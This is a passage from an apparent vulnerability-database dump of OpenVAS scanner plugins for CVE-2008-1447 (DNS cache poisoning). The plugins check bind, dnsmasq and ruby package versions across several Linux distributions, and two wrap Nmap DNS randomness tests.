See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\nhttp://www.isc.org/sw/bind/bind-security.php\nhttp://www.kb.cert.org/vuls/id/800113\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-191-02\";\n \nif(description)\n{\n script_id(61464);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-191-02 bind \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-27T10:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of dnsmasq", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870106", "href": "http://plugins.openvas.org/nasl.php?oid=870106", 
"type": "openvas", "title": "RedHat Update for dnsmasq RHSA-2008:0789-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dnsmasq RHSA-2008:0789-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\n provide DNS and, optionally, DHCP, to a small network.\n\n The dnsmasq DNS resolver used a fixed source UDP port. This could have made\n DNS spoofing attacks easier. dnsmasq has been updated to use random UDP\n source ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n \n All dnsmasq users are advised to upgrade to this updated package, that\n upgrades dnsmasq to version 2.45, which resolves this issue.\";\n\ntag_affected = \"dnsmasq on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00005.html\");\n script_id(870106);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"RHSA\", value: \"2008:0789-01\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"RedHat Update for dnsmasq RHSA-2008:0789-01\");\n\n script_summary(\"Check for the Version of dnsmasq\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dnsmasq-debuginfo\", rpm:\"dnsmasq-debuginfo~2.45~1.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:1361412562310803552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803552", "type": "openvas", "title": "Nmap NSE 6.01: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\\n\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803552\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:00:41 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: dns-random-txid\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2013 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/txidtest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. 
In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-04-09T11:40:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880254", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS cache-poisoning attacks easier. 
In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015084.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880254\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:51:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-334-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61947", "href": "http://plugins.openvas.org/nasl.php?oid=61947", "type": "openvas", "title": "Slackware Advisory SSA:2008-334-01 ruby", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_334_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-334-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-334-01\";\n \nif(description)\n{\n script_id(61947);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-334-01 ruby \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. 
In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2017-03-06T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104103", "href": "http://plugins.openvas.org/nasl.php?oid=104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_srcport_net.nasl 5499 2017-03-06 13:06:09Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). 
Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(104103);\n script_version(\"$Revision: 5499 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-06 14:06:09 +0100 (Mon, 06 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n\n nmap_nse_register(script:\"dns-random-srcport\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"dns-random-srcport\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (dns-random-srcport.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + 
res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Oracle Linux Local Security Checks ELSA-2008-0533", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122571", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0533", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0533.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122571\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:21 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0533\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0533 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0533\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0533.html\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.0.1.P1.el5_2\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) 
